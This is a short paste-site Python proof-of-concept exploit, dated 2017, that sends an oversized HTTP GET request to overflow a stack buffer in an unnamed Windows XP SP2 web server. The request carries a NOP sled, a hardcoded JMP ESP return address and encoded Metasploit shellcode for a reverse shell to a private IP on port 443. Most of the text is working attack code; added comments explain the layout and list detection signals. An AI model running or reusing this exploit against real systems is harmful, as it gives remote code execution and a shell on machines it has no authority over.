Oct 23rd, 2017
  1.  
  2. #!/usr/bin/python
  3. # Proof-of-concept request builder: sends one HTTP GET whose request target is an oversized binary string, presumably aimed at a stack overflow in the receiving server's request handling (the page does not name the server).
  4. import socket
  5. # The target is an RFC 1918 private address, as is the LHOST in the payload comment below; presumably an isolated test network.
  6. target_address="192.168.2.7"
  7. target_port=80
  8. # Request layout: "GET " + 1787 filler bytes + 4-byte return-address overwrite + 16 pad bytes + encoded payload + " HTTP/1.1" and an empty header section.
  9. buffer = "GET "
  10. buffer+= "\x90" * 1787  # filler of 0x90 bytes preceding the overwritten return address
  11. buffer+= "\xF3\x30\x9D\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP, 7C9D30F3. Stored little-endian; a fixed address inside one DLL build, so it assumes that exact module version at a fixed load address and an executable stack. ASLR and DEP on the target invalidate both assumptions.
  12. # msfpayload windows/shell_reverse_tcp LHOST=192.168.2.15 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c - x86/shikata_ga_nai 342 bytes
  13. buffer+= "\x90" * 16  # 16-byte 0x90 pad between the return address and the payload
  14. buffer+= ("\xdb\xdd\xd9\x74\x24\xf4\x2b\xc9\xb1\x4f\x58\xba\x2c\x98\x23" "\x31\xc9\xba\xb6\x11\x96\xe7\xd9\xc5\xd9\x74\x24\xf4\x5e\xb1" "\x4f\x31\x56\x13\x03\x56\x13\x83\xee\xfc\xe2\x43\xed\x7e\x6e"
  15. "\xab\x0e\x7f\x11\x22\xeb\x4e\x03\x50\x7f\xe2\x93\x13\x2d\x0f"
  16. "\x5f\x71\xc6\x84\x2d\x5d\xe9\x2d\x9b\xbb\xc4\xae\x2d\x03\x8a"
  17. "\x6d\x2f\xff\xd1\xa1\x8f\x3e\x1a\xb4\xce\x07\x47\x37\x82\xd0"
  18. "\x03\xea\x33\x55\x51\x37\x35\xb9\xdd\x07\x4d\xbc\x22\xf3\xe7"
  19. "\xbf\x72\xac\x7c\xf7\x6a\xc6\xdb\x27\x8a\x0b\x38\x1b\xc5\x20"
  20. "\x8b\xe8\xd4\xe0\xc5\x11\xe7\xcc\x8a\x2c\xc7\xc0\xd3\x69\xe0"
  21. "\x3a\xa6\x81\x12\xc6\xb1\x52\x68\x1c\x37\x46\xca\xd7\xef\xa2"
  22. "\xea\x34\x69\x21\xe0\xf1\xfd\x6d\xe5\x04\xd1\x06\x11\x8c\xd4"
  23. "\xc8\x93\xd6\xf2\xcc\xf8\x8d\x9b\x55\xa5\x60\xa3\x85\x01\xdc"
  24. "\x01\xce\xa0\x09\x33\x8d\xac\xfe\x0e\x2d\x2d\x69\x18\x5e\x1f"
  25. "\x36\xb2\xc8\x13\xbf\x1c\x0f\x53\xea\xd9\x9f\xaa\x15\x1a\xb6"
  26. "\x68\x41\x4a\xa0\x59\xea\x01\x30\x65\x3f\x85\x60\xc9\x90\x66"
  27. "\xd0\xa9\x40\x0f\x3a\x26\xbe\x2f\x45\xec\xc9\x77\xd1\xcf\x62"
  28. "\x75\x2e\xb8\x70\x7a\x31\x83\xfc\x9c\x5b\xe3\xa8\x37\xf3\x9a"
  29. "\xf0\xcc\x62\x62\x2f\x44\x07\xf1\xb4\x95\x4e\xea\x62\xc1\x07"
  30. "\xdc\x7a\x87\xb5\x47\xd5\xba\x44\x11\x1e\x7e\x92\xe2\xa1\x7e"
  31. "\x57\x5e\x86\x90\xa1\x5f\x82\xc4\x7d\x36\x5c\xb3\x3b\xe0\x2e"
  32. "\x6d\x95\x5f\xf9\xf9\x60\xac\x3a\x7c\x6d\xf9\xcc\x60\xdf\x54"
  33. "\x89\x9f\xef\x30\x1d\xe7\x12\xa1\xe2\x32\x97\xd1\xa8\x1f\xb1"
  34. "\x79\x75\xca\x80\xe7\x86\x20\xc6\x11\x05\xc1\xb6\xe5\x15\xa0"
  35. "\xb3\xa2\x91\x58\xc9\xbb\x77\x5f\x7e\xbb\x5d\x55")
  36. # Detection notes: the request line carries roughly 2 KB of non-printable bytes opening with a long 0x90 run, and the HTTP/1.1 request has no Host header. Per the generator comment the payload is a reverse shell to 192.168.2.15 on TCP 443, so an outbound connection from the web server to that port is the follow-on signal. A front-end limit on request-line length would presumably stop the request before it reaches the server's parser.
  37. buffer+= " HTTP/1.1\r\n\r\n"
  38. # Single TCP connection, one send, no response read.
  39. sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  40. connect=sock.connect((target_address,target_port))  # connect() returns None; the name is never used afterwards
  41. sock.send(buffer)
  42. sock.close()